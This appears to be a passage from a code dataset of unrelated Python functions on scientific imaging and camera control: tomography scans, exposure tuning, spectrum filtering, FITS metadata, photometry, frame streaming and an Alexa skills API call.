index))\n index = index + 1 \n optimizeBeam = 0\n \n #add dark and flat only if not done in last steps\n if imageSinceFlat != 0:\n for i in range(imagesPerFlat):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index)) #flat\n index = index + 1\n if imageSinceDark != 0:\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index)) #dark\n index = index + 1 \n# scan_points1 = generateScanPoints(inBeamPosition, outOfBeamPosition, theta_points, darkFieldInterval, flatFieldInterval,\n# imagesPerDark, imagesPerFlat, optimizeBeamInterval, 
pattern=pattern)\n# if pattern == 'default' or pattern == 'DFPFD':\n# i = 0\n# for pt1 in scan_points1:\n# pt = scan_points[i]\n# if pt1 != pt:\n# print \"Mismatch - please tell Kaz about your scan and its arguments!\"\n# print \"i = \", i\n# print \"pt = \", pt\n# print \"pt1 = \", pt1\n# i += 1\n #return None\n positionProvider = tomoScan_positions(start, stop, step, darkFieldInterval, imagesPerDark, flatFieldInterval, imagesPerFlat, \\\n inBeamPosition, outOfBeamPosition, optimizeBeamInterval, scan_points) \n scan_args = [tomoScanDevice, positionProvider, tomography_time, tomography_beammonitor, tomography_detector, exposureTime, tomography_camera_stage, tomography_sample_stage]\n #scan_args.append(RotationAxisScannable(\"approxCOR\", tomoRotationAxis))\n #meta_add(RotationAxisScannable(\"approxCOR\", tomoRotationAxis))\n #meta_add(\"RotationCoord_as_list\", [tomoRotationAxis])\n meta_add(\"approxCOR\", tomoRotationAxis)\n for scannable in additionalScannables:\n scan_args.append(scannable)\n for scannable in tomo_additional_scannables:\n scan_args.append(scannable)\n ''' setting the description provided as the title'''\n if not description == None: \n setTitle(description)\n else :\n setTitle(\"undefined\")\n \n dataFormat = LocalProperties.get(\"gda.data.scan.datawriter.dataFormat\")\n if not dataFormat == \"NexusDataWriter\":\n handle_messages.simpleLog(\"Data format inconsistent. Setting 'gda.data.scan.datawriter.dataFormat' to 'NexusDataWriter'\")\n LocalProperties.set(\"gda.data.scan.datawriter.dataFormat\", \"NexusDataWriter\")\n scanObject = createConcurrentScan(scan_args)\n if addNXEntry:\n addNXTomoSubentry(scanObject, tomography_detector.name, tomography_theta.name)\n scanObject.runScan()\n if autoAnalyse:\n lsdp=jns.lastScanDataPoint()\n OSCommandRunner.runNoWait([\"/dls_sw/apps/tomopy/tomopy/bin/gda/tomo_at_scan_end_kz\", lsdp.currentFilename], OSCommandRunner.LOGOPTION.ALWAYS, None)\n return scanObject;\n except InterruptedException:\n exceptionType, exception, traceback = sys.exc_info()\n handle_messages.log(None, \"User interrupted the scan\", exceptionType, exception, traceback, False)\n raise InterruptedException(\"User interrupted the scan\")\n except:\n exceptionType, exception, traceback = sys.exc_info()\n handle_messages.log(None, \"Error during tomography scan\", exceptionType, exception, traceback, False)\n raise Exception(\"Error during tomography scan\", exception)\n finally:\n handle_messages.simpleLog(\"Data Format reset to the original setting: \" + dataFormat)\n LocalProperties.set(\"gda.data.scan.datawriter.dataFormat\", dataFormat)", "def event(self,evt,evn):\n #import pdb; pdb.set_trace()\n if (evt.get(\"skip_event\")):\n return\n # check if FEE data is one or two dimensional\n data = evt.get(Camera.FrameV1, self.src)\n if data is None:\n one_D = True\n data = evt.get(Bld.BldDataSpectrometerV1, self.src)\n else:\n one_D = False\n # get event timestamp\n timestamp = cspad_tbx.evt_timestamp(cspad_tbx.evt_time(evt)) # human readable format\n\n if data is None:\n self.nnodata +=1\n #self.logger.warning(\"event(): No spectrum data\")\n evt.put(skip_event_flag(),\"skip_event\")\n\n if timestamp is None:\n evt.put(skip_event_flag(),\"skip_event\")\n #self.logger.warning(\"event(): No TIMESTAMP, skipping shot\")\n\n elif data is not None:\n self.nshots +=1\n # get data as array and split into two half to find each peak\n if one_D:\n # filtering out outlier spikes in FEE data\n data = np.array(data.hproj().astype(np.float64))\n for i in range(len(data)):\n if 
data[i]>1000000000:\n data[i]=data[i]-(2**32)\n if self.dark is not None:\n data = data - self.dark\n spectrum = data\n spectrum1 = data[:data.shape[0]//2]\n spectrum2 = data[data.shape[0]//2:]\n else:\n data = np.array(data.data16().astype(np.int32))\n if self.dark is not None:\n data = data - self.dark\n data = np.double(data)\n data_split1 = data[:,:data.shape[1]//2]\n data_split2 = data[:,data.shape[1]//2:]\n # make a 1D trace of entire spectrum and each half to find peaks\n spectrum = np.sum(data,0)/data.shape[0]\n spectrum1 = np.sum(data_split1,0)/data_split1.shape[0]\n spectrum2 = np.sum(data_split2,0)/data_split2.shape[0]\n if not one_D:\n # the x-coordinate of the weighted center of peak region\n weighted_peak_one_positions = []\n for i in range(self.peak_one_range_min,self.peak_one_range_max):\n weighted_peak_one_positions.append(spectrum[i]*i)\n weighted_sum_peak_one = np.sum(weighted_peak_one_positions)\n weighted_peak_one_center_position = weighted_sum_peak_one/np.sum(spectrum[self.peak_one_range_min:self.peak_one_range_max])\n\n weighted_peak_two_positions = []\n for i in range(self.peak_two_range_min,self.peak_two_range_max):\n weighted_peak_two_positions.append(spectrum[i]*i)\n weighted_sum_peak_two = np.sum(weighted_peak_two_positions)\n weighted_peak_two_center_position = weighted_sum_peak_two/np.sum(spectrum[self.peak_two_range_min:self.peak_two_range_max])\n\n # normalized integrated regions between the peaks\n #int_left_region = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region = np.sum(spectrum[:weighted_peak_two_center_position/2])\n\n #int_left_region_norm = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region_norm = np.sum(spectrum[:weighted_peak_two_center_position/2])/len(spectrum[:weighted_peak_two_center_position/2])\n\n int_right_region = np.sum(spectrum[self.peak_two_range_max:])\n\n int_right_region_norm = np.sum(spectrum[self.peak_two_range_max:])/len(spectrum[self.peak_two_range_max:])\n\n # normalized integrated peaks\n int_peak_one = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_one_norm = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])/len(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_two = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n int_peak_two_norm = 
np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n if not one_D:\n if int_peak_one_norm/int_peak_two_norm > self.peak_ratio:\n print(\"event(): inflection peak too high\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_left_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy left of low energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_right_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy right of high energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n #self.logger.info(\"TIMESTAMP %s accepted\" %timestamp)\n self.naccepted += 1\n self.ntwo_color += 1\n print(\"%d Remote shot\" %self.ntwo_color)\n print(\"%s Remote timestamp\" %timestamp)", "def changeExposure(cam=0, increment=None, value=None):\n try:\n if increment is not None:\n exposure = commands.getoutput(\"v4l2-ctl -d {} --get-ctrl exposure_absolute\".format(cam)).split()[1]\n exposure = int(exposure)\n exposure = max(0, exposure + increment)\n elif value is not None:\n exposure = max(0, value)\n else:\n raise Exception(\"increment or value must be an integer\")\n commands.getoutput(\"v4l2-ctl -d {} --set-ctrl exposure_absolute={}\".format(cam, exposure))\n print \"Exposure {}\".format(exposure)\n except Exception as e:\n print \"Failed to change exposure: {}\".format(e)", "def tune_exposure_time(camera, target, initial_exptime, min_exptime=0, max_exptime=None,\n max_steps=5, tolerance=0.1, cutout_size=256, bias=None, **kwargs):\n camera.logger.info(f\"Tuning exposure time for {camera}.\")\n\n images_dir = camera.get_config(\"directories.images\", None)\n if images_dir:\n images_dir = os.path.join(images_dir, \"temp\")\n os.makedirs(images_dir, exist_ok=True)\n\n # Parse quantities\n initial_exptime = get_quantity_value(initial_exptime, \"second\") * u.second\n\n if min_exptime is not None:\n min_exptime = get_quantity_value(min_exptime, \"second\") * u.second\n if max_exptime is not None:\n max_exptime = get_quantity_value(max_exptime, \"second\") * u.second\n\n try:\n bit_depth = camera.bit_depth.to_value(\"bit\")\n except NotImplementedError:\n bit_depth = 16\n\n saturated_counts = 2 ** bit_depth\n\n prefix = images_dir if images_dir is None else images_dir + \"/\"\n with tempfile.NamedTemporaryFile(suffix=\".fits\", prefix=prefix, delete=False) as tf:\n\n exptime = initial_exptime\n\n for step in range(max_steps):\n\n # Check if exposure time is within valid range\n if (exptime == max_exptime) or (exptime == min_exptime):\n break\n\n # Get an image\n cutout = camera.get_cutout(exptime, tf.name, cutout_size, keep_file=False, **kwargs)\n cutout = cutout.astype(\"float32\")\n if bias is not None:\n cutout -= bias\n\n # Measure average counts\n normalised_counts = np.median(cutout) / saturated_counts\n\n camera.logger.debug(f\"Normalised counts for {exptime} exposure on {camera}:\"\n f\" {normalised_counts}\")\n\n # Check if tolerance condition is met\n if tolerance:\n if abs(normalised_counts - target) < tolerance:\n break\n\n # Update exposure time\n exptime = exptime * target / normalised_counts\n 
if max_exptime is not None:\n exptime = min(exptime, max_exptime)\n if min_exptime is not None:\n exptime = max(exptime, min_exptime)\n\n camera.logger.info(f\"Tuned exposure time for {camera}: {exptime}\")\n\n return exptime", "def update_exposure_v1(self, skill_id, experiment_id, update_exposure_request, **kwargs):\n # type: (str, str, UpdateExposureRequest_ce52ce53, **Any) -> Union[ApiResponse, object, StandardizedError_f5106a89, BadRequestError_f854b05]\n operation_name = \"update_exposure_v1\"\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'skill_id' is set\n if ('skill_id' not in params) or (params['skill_id'] is None):\n raise ValueError(\n \"Missing the required parameter `skill_id` when calling `\" + operation_name + \"`\")\n # verify the required parameter 'experiment_id' is set\n if ('experiment_id' not in params) or (params['experiment_id'] is None):\n raise ValueError(\n \"Missing the required parameter `experiment_id` when calling `\" + operation_name + \"`\")\n # verify the required parameter 'update_exposure_request' is set\n if ('update_exposure_request' not in params) or (params['update_exposure_request'] is None):\n raise ValueError(\n \"Missing the required parameter `update_exposure_request` when calling `\" + operation_name + \"`\")\n\n resource_path = '/v1/skills/{skillId}/experiments/{experimentId}/exposurePercentage'\n resource_path = resource_path.replace('{format}', 'json')\n\n path_params = {} # type: Dict\n if 'skill_id' in params:\n path_params['skillId'] = params['skill_id']\n if 'experiment_id' in params:\n path_params['experimentId'] = params['experiment_id']\n\n query_params = [] # type: List\n\n header_params = [] # type: List\n\n body_params = None\n if 'update_exposure_request' in params:\n body_params = params['update_exposure_request']\n header_params.append(('Content-type', 'application/json'))\n header_params.append(('User-Agent', self.user_agent))\n\n # Response Type\n full_response = False\n if 'full_response' in params:\n full_response = params['full_response']\n\n # Authentication setting\n access_token = self._lwa_service_client.get_access_token_from_refresh_token()\n authorization_value = \"Bearer \" + access_token\n header_params.append(('Authorization', authorization_value))\n\n error_definitions = [] # type: List\n error_definitions.append(ServiceClientResponse(response_type=None, status_code=204, message=\"Success. 
No content.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.bad_request_error.BadRequestError\", status_code=400, message=\"Server cannot process the request due to a client error.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=401, message=\"The auth token is invalid/expired or doesn&#39;t have access to the resource.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.bad_request_error.BadRequestError\", status_code=403, message=\"The operation being requested is not allowed.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=404, message=\"The resource being requested is not found.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=409, message=\"The request could not be completed due to a conflict with the current state of the target resource.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=429, message=\"Exceeds the permitted request limit. Throttling criteria includes total requests, per API, ClientId, and CustomerId.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=500, message=\"Internal Server Error.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=503, message=\"Service Unavailable.\"))\n\n api_response = self.invoke(\n method=\"POST\",\n endpoint=self._api_endpoint,\n path=resource_path,\n path_params=path_params,\n query_params=query_params,\n header_params=header_params,\n body=body_params,\n response_definitions=error_definitions,\n response_type=None)\n\n if full_response:\n return api_response\n \n return None", "def metadata(filename, header=fits.PrimaryHDU().header, clear=True):\n\n if clear:\n header.clear()\n\n header.append(('comment', ''), end=True)\n header.append(('comment', '*'*60), end=True)\n header.append(('comment', '*'*18 + ' Time and Pointing Data ' + '*'*18), end=True)\n header.append(('comment', '*'*60), end=True)\n header.append(('comment', ''), end=True)\n\n try:\n origname = re.sub('.*CRSA', '', re.sub('.fits', '', filename))\n header.append(('origname', origname, 'Original file ID number'), end=True)\n except:\n pass\n\n ####################################################################\n # Attempt to get the mean time of the exposure. Try three things:\n # 1. The mean of mjd-str and mjd-end in the main header (HDU 0)\n # 2. mjd in the main header (HDU 0)\n # 3. 
The mean acquisition time in the headers of the individual \n # reads, computed as acqtime in HDU 1 plus 1.48s/2*nreads\n ####################################################################\n\n mjd_ok = True\n try:\n head = fits.open(filename)[0].header\n try:\n mean_mjd = 0.5*(head['mjd-str'] + head['mjd-end'])\n except:\n try:\n mean_mjd = head['mjd'] + 1.48*0.5*len(fits.open(filename))/86400\n except:\n ########################################################\n # Note: acqtime is unreliable--doesn't always update.\n ########################################################\n #head1 = fits.open(filename)[1].header\n #mean_mjd = head1['acqtime'] - 2400000.5\n #mean_mjd += 1.48*0.5*len(fits.open(filename))/86400\n ########################################################\n # This is pretty bad: use the checksum time of the\n # middle read as the time stamp of last resort.\n ########################################################\n head1 = fits.open(filename)[len(fits.open(filename))//2].header\n t = head1.comments['checksum'].split()[-1]\n t = Time(t, format='isot')\n t.format = 'mjd'\n mean_mjd = float(str(t)) \n except:\n mjd_ok = False\n mean_mjd = np.nan\n utc_date = 'unavailable'\n utc_time = 'unavailable'\n\n pos_ok = True\n\n ####################################################################\n # Need RA and Dec to compute parallactic angle\n ####################################################################\n\n try:\n head = fits.open(filename)[0].header\n ra, dec = [head['ra'], head['dec']]\n except:\n #ra, dec = ['05:02:27.5438', '+07:27:39.265']\n \t#ra, dec = ['04:37:36.182', '-02:28:25.87']\n pos_ok = False\n \n if mjd_ok:\n\n ################################################################\n # Subaru's coordinates in degrees\n ################################################################\n \n lng, lat = [-155.4760187, 19.825504]\n subaru = (str(lng) + 'd', str(lat) + 'd')\n t = Time(mean_mjd, format='mjd', location=subaru)\n \n if pos_ok:\n\n ############################################################\n # Precess from J2000 to the appropriate epoch\n ############################################################\n\n c = coord.SkyCoord(ra=ra, dec=dec, unit=(u.hourangle, u.deg), frame='fk5')\n \n equinox = 'J%.5f' %(2000 + (mean_mjd - 51544.5)/365.25)\n c = c.transform_to(coord.FK5(equinox=equinox))\n\n ################################################################\n # Compute hour angle to get parallactic angle\n ################################################################\n\n ha = (t.sidereal_time('apparent') - c.ra).rad\n lat = lat*np.pi/180\n \n pa = -np.arctan2(-np.sin(ha), np.cos(c.dec.rad)*np.tan(lat)\n - np.sin(c.dec.rad)*np.cos(ha))\n pa = float(pa%(2*np.pi))\n else:\n pa = np.nan\n\n t.format = 'isot'\n utc_date = str(t).split('T')[0]\n utc_time = str(t).split('T')[1]\n else:\n pa = np.nan\n\n if not np.isfinite(mean_mjd):\n mean_mjd = utc_date = utc_time = 'unavailable'\n\n header['mjd'] = (mean_mjd, 'Mean MJD of exposure') \n header['utc-date'] = (utc_date, 'UTC date of exposure') \n header['utc-time'] = (utc_time, 'Mean UTC time of exposure')\n\n ####################################################################\n # Attempt to fetch useful/important keywords from the original\n # file's FITS header\n ####################################################################\n\n header.append(_fetch('ra', filename, comment='RA of telescope pointing'))\n header.append(_fetch('dec', filename, comment='DEC of telescope pointing'))\n\n if np.isfinite(pa):\n 
header['parang'] = (pa*180/np.pi, 'Mean parallactic angle (degrees)')\n else:\n header['parang'] = ('unavailable', 'Mean parallactic angle (degrees)')\n header.append(_fetch('d_imrpap', filename, comment='Image rotator pupil position angle (degrees)'))\n\n header.append(_fetch('HIERARCH CHARIS.FILTER.NAME', filename, \n comment='CHARIS filter name', newkey='filtname'))\n header.append(_fetch('HIERARCH CHARIS.FILTER.SLOT', filename, \n comment='CHARIS filter slot', newkey='filtpos'))\n header.append(_fetch('HIERARCH CHARIS.SHUTTER', filename, \n comment='CHARIS shutter position', newkey='shutter'))\n\n return header", "def exposure(self):\n\n # define a range of declination to evaluate the\n # exposure at\n self.declination = np.linspace(-np.pi/2, np.pi/2, self.num_points)\n\n m = np.asarray([m_dec(d, self.params) for d in self.declination])\n \n # normalise to a maximum at 1\n self.exposure_factor = (m / m_dec(-np.pi/2, self.params))\n\n # find the point at which the exposure factor is 0\n self.limiting_dec = Angle((self.declination[m == 0])[0], 'rad')", "def _do_expose_loop(self, fitsfile, seconds):\n log.debug(f\"Starting expose loop with {self.max_exposures} exposures\")\n while (self.current_exposure is not None and \n self.current_exposure < self.max_exposures):\n self.current_exposure += 1\n self.Expose(fitsfile, seconds)\n while self.process and self.process.poll() is None:\n sleep(5)\n if not self.process or self.process.returncode != 0:\n break\n \n self.current_exposure = None\n self.max_exposures = None", "def request():\n return face_client.face.detect_with_stream(image=open(\"frame.png\", 'rb'),\n return_face_attributes=[emotion_attribute],\n recognition_model='recognition_02')", "def __init__(self, exposure = -1):\n self.cam = None\n self.exposure = exposure\n\n self._set_camera()", "def run_observation(self):\n\n self._generate_direct_image() # to calibrate x_ref and y_ref\n\n num_frames = len(self.exp_start_times)\n progress = Progress(num_frames)\n self.progess = progress\n\n progress_line = 'Generating frames 0/{} done'.format(num_frames)\n progress.print_status_line(progress_line)\n progress.progress_line = progress_line\n\n for i, start_time in enumerate(self.exp_start_times):\n filenum = i + 1\n self._generate_exposure(start_time, filenum)\n\n progress.increment()\n progress_line = 'Generating frames {}/{} done'.format(filenum,\n num_frames)\n progress.print_status_line(progress_line)\n\n # so it can be retreived by exposure_generator\n progress.progress_line = progress_line", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def exposure():\n def r(x):\n return x/6e4\n\n def w(x):\n return int(x*6e4)\n return r, w", "def send_frame(self):\n frame = self.frame_buffer.get()\n result, jpeg = cv2.imencode(\".jpg\", frame.nparray)#, self.encode_param)\n data = numpy.array(jpeg)\n string_data = data.tostring()\n self.sock.send(str(len(string_data)).ljust(16))\n self.sock.send(string_data)", "def execute_experiment(\n self,\n capture_settings=None,\n file_path=None,\n position_list=None,\n interactive=False,\n ):\n hardware_components.log_method(self, \"execute_experiment\")\n # call execute_experiment method in ConnectMicroscope instance.\n # This instance will be based on a microscope specific connect module.\n 
timeStart = datetime.datetime.now()\n\n communication_object = self._get_control_software().connection\n try:\n if position_list is None:\n service_response = communication_object.snap_image(capture_settings)\n else:\n service_response = communication_object.execute_experiment(\n capture_settings, position_list\n )\n self.last_experiment = capture_settings\n except AutomationError as error:\n self.recover_hardware(error)\n\n timeEnd = datetime.datetime.now()\n\n image = ImageAICS(meta={\"aics_Experiment\": capture_settings})\n # image.add_meta(self.settings)\n\n # add meta data about acquisition time\n timeDuration = (timeEnd - timeStart).total_seconds()\n image.add_meta(service_response)\n image.add_meta(\n {\n \"aics_dateStartShort\": timeStart.strftime(\"%Y%m%d\"),\n \"aics_dateEndShort\": timeEnd.strftime(\"%Y%m%d\"),\n \"aics_dateStart\": timeStart.strftime(\"%m/%d/%Y\"),\n \"aics_dateEnd\": timeEnd.strftime(\"%m/%d/%Y\"),\n \"aics_timeStart\": timeStart.strftime(\"%H:%M:%S\"),\n \"aics_timeEnd\": timeEnd.strftime(\"%H:%M:%S\"),\n \"aics_timeDuration\": timeDuration,\n }\n )\n # save image\n if file_path:\n image = self.save_image(file_path, image, interactive=interactive)\n return image", "def query_and_read_frame(frame_type, channels, start_time, end_time):\n logging.info('querying datafind server')\n paths = frame_paths(frame_type, start_time, end_time)\n logging.info('found files: %s' % (' '.join(paths)))\n return read_frame(paths, channels, \n start_time=start_time, \n end_time=end_time)", "def insert_exposure(\n self, expid, night, telra=None, teldec=None,\n tile=None, dateobs=None, flavor=None, exptime=None\n ):\n\n # Check if expid is already registered\n if not Exposure.objects.filter(exposure_id=expid):\n exposure = Exposure(\n exposure_id=expid, night=night,\n telra=telra, teldec=teldec,\n tile=tile, dateobs=dateobs,\n flavor=flavor, exptime=exptime\n )\n exposure.save()\n\n # Save Process for this exposure\n return Exposure.objects.get(exposure_id=expid)", "def photometry(self, ctr1, ctr2):\n if not self.HAS_PIPECAL:\n log.warning('Photometry is not available. 
The '\n 'sofia_redux.calibration package is required.')\n return\n\n # reset photometry table if necessary\n if self.ptable is None:\n self.reset_ptable()\n\n # get photometry parameters\n param = self.phot_parameters\n\n # check for the current status of the viewer\n # (tiling, aligned by wcs)\n if self.run('tile', via='get') == 'yes':\n allframes = True\n frames = self.run('frame active', via='get').split()\n else:\n allframes = False\n frames = [self.run('frame', via='get')]\n if self.run('wcs align', via='get') == 'yes':\n cs = 'wcs'\n else:\n cs = 'image'\n\n # log input values\n log.info(f'Photometry at x={ctr1}, y={ctr2} (in {cs} coordinates)')\n log.info('Parameters:')\n log.info(f\" Model: {param['model']}\")\n log.info(f\" Window: {param['window']} {param['window_units']}\")\n log.info(f\" Starting FWHM: {param['fwhm']} {param['fwhm_units']}\")\n log.info(f\" Aperture: {param['psf_radius']} \"\n f\"{param['aperture_units']}\")\n log.info(f\" Background: radius {param['bg_inner']} \"\n f\"{param['aperture_units']}, width {param['bg_width']} \"\n f\"{param['aperture_units']}\")\n log.info('')\n\n for frame in frames:\n if allframes:\n log.debug('Selecting frame ' + frame)\n self.run('frame ' + frame)\n\n try:\n results = self.retrieve_data(ctr1, ctr2)\n except (ValueError, TypeError) as err:\n log.debug(f'Error in retrieving Frame {frame} data: {err}')\n continue\n ps = results['pix_scale']\n data = results['data']\n fulldata = results['fulldata']\n hwcs = results['wcs']\n wdw = results['window']\n xstart = results['xstart']\n ystart = results['ystart']\n xctr = results['xctr']\n yctr = results['yctr']\n filename = results['filename']\n\n log.info(f'Frame {frame}: {filename}')\n\n # check for reasonable data\n if np.sum(np.isfinite(data)) < 3:\n continue\n\n default_fwhm = param['fwhm']\n if param['fwhm_units'] == 'arcsec':\n default_fwhm /= ps\n try:\n psfr = float(param['psf_radius'])\n if param['aperture_units'] == 'arcsec':\n psfr /= ps\n except ValueError:\n # auto radius\n psfr = 2.15 * default_fwhm\n\n if (param['bg_inner'] is None\n or param['bg_width'] is None):\n do_bg = False\n skyrad = (0., 0.)\n else:\n do_bg = True\n try:\n bgrin = float(param['bg_inner'])\n if param['aperture_units'] == 'arcsec':\n bgrin /= ps\n except ValueError:\n bgrin = psfr + 0.2 * default_fwhm\n try:\n bgwid = float(param['bg_width'])\n if param['aperture_units'] == 'arcsec':\n bgwid /= ps\n bgrout = bgrin + bgwid\n except ValueError:\n bgrout = bgrin + 2.0 * default_fwhm\n\n if bgrout > bgrin:\n skyrad = (bgrin, bgrout)\n else:\n skyrad = (0., 0.)\n\n try:\n phot_par = pipecal_photometry(\n fulldata, np.full_like(fulldata, np.nan),\n srcpos=(xctr, yctr), fitsize=wdw, fwhm=default_fwhm,\n profile=param['model'], aprad=psfr,\n skyrad=skyrad, stamp_center=False, allow_badfit=True)\n except PipeCalError as err:\n log.warning(' Bad fit.')\n log.warning(f' {err}')\n continue\n\n peak, xcent, ycent, ra, dec, xfwhm, yfwhm, ellip, \\\n pa, pw_law, final_sum, bg_avg, bg_std = [np.nan] * 13\n bg_fit = 0.0\n for pp in phot_par:\n if pp['key'] == 'STPEAK':\n peak = pp['value'][0]\n elif pp['key'] == 'STCENTX':\n xcent = pp['value'][0]\n elif pp['key'] == 'STCENTY':\n ycent = pp['value'][0]\n elif pp['key'] == 'STFWHMX':\n xfwhm = pp['value'][0]\n elif pp['key'] == 'STFWHMY':\n yfwhm = pp['value'][0]\n elif pp['key'] == 'STANGLE':\n pa = pp['value'][0]\n elif pp['key'] == 'STPWLAW':\n pw_law = pp['value'][0]\n elif pp['key'] == 'STAPFLX':\n final_sum = pp['value'][0]\n elif pp['key'] == 'STAPSKY' and 
do_bg:\n bg_avg = pp['value'][0]\n elif pp['key'] == 'STAPSSTD' and do_bg:\n bg_std = pp['value']\n elif pp['key'] == 'STBKG':\n bg_fit = pp['value'][0]\n\n # check whether source is already in table\n limit = 2. * default_fwhm\n present = (int(frame) == self.ptable['Frame']) \\\n & (np.abs(self.ptable['X'] - (xcent + 1)) < limit) \\\n & (np.abs(self.ptable['Y'] - (ycent + 1)) < limit)\n if np.any(present):\n log.info(' Source already measured.')\n continue\n\n # check whether source is unreasonably large or small\n badfit = False\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n mfwhm = gmean([xfwhm, yfwhm])\n if np.isnan(mfwhm) or mfwhm > 20 or mfwhm < 1.0:\n log.warning(' Bad fit.')\n log.warning(' Calculated FWHM: {:.2f} pixels'.format(mfwhm))\n badfit = True\n mfwhm = np.nan\n ellip = np.nan\n pa = np.nan\n else:\n # calculate ellipticity and fix PA\n if xfwhm >= yfwhm:\n ellip = 1 - yfwhm / xfwhm\n else:\n ellip = 1 - xfwhm / yfwhm\n if pa <= 0:\n pa += 90\n else:\n pa -= 90\n\n # track flux by radial distance\n if param['show_plots']:\n y, x = np.mgrid[:wdw, :wdw]\n r = np.sqrt((x - xcent + xstart) ** 2\n + (y - ycent + ystart) ** 2)\n if badfit:\n moddata = None\n else:\n # get the equivalent 1D model from the profile fit\n # for plotting\n if param['model'] == 'gaussian':\n eqw = mfwhm * stats.gaussian_fwhm_to_sigma\n rmodel = modeling.models.Gaussian1D(peak, 0.0, eqw)\n else:\n n_1 = 1 / pw_law\n eqw = mfwhm / (2 * np.sqrt(2 ** n_1 - 1))\n rmodel = modeling.models.Moffat1D(\n peak, 0.0, eqw, pw_law)\n rmodel += modeling.models.Const1D(bg_fit)\n moddata = rmodel(r)\n\n # data for matplotlib viewer: primary is model;\n # scatter data and h/v lines are overplots\n rflat = r.ravel()\n dflat = data.ravel()\n sortidx = np.argsort(rflat)\n xdata = rflat[sortidx]\n overplots = [{'plot_type': 'scatter',\n 'args': [rflat, dflat],\n 'kwargs': {'marker': '*',\n 'c': dflat,\n 'label': 'Flux data'}},\n {'plot_type': 'hline',\n 'args': [0.0],\n 'kwargs': {'linestyle': ':',\n 'linewidth': 1,\n 'color': 'lightgray'}}]\n if moddata is not None:\n ydata = moddata.ravel()[sortidx]\n overplots.append({'plot_type': 'vline',\n 'args': [mfwhm / 2.0],\n 'kwargs': {\n 'linestyle': ':',\n 'linewidth': 1,\n 'color': '#ff7f0e',\n 'label': 'Fit HWHM'}})\n overplots.append({'plot_type': 'vline',\n 'args': [mfwhm],\n 'kwargs': {\n 'linestyle': ':',\n 'linewidth': 1,\n 'color': '#d62728',\n 'label': 'Fit FWHM'}})\n else:\n ydata = np.full_like(xdata, np.nan)\n\n title = f'Frame {frame}, x={xcent:.0f} y={ycent:.0f}'\n overplots.append({'plot_type': 'legend',\n 'args': []})\n plot_data = {'args': [xdata, ydata],\n 'kwargs': {\n 'title': title,\n 'xlabel': 'Distance (pixels)',\n 'ylabel': 'Flux'},\n 'plot_kwargs': {\n 'linestyle': '-',\n 'color': 'gray',\n 'label': f\"{param['model'].title()} profile\"},\n 'overplot': overplots}\n self.radial_data.append(plot_data)\n\n # add DS9 start index back into centroid and convert to RA/Dec\n xcent += 1\n ycent += 1\n if hwcs is not None:\n try:\n radec = hwcs.wcs_pix2world([[xcent, ycent, 1]], 1)\n except ValueError:\n try:\n radec = 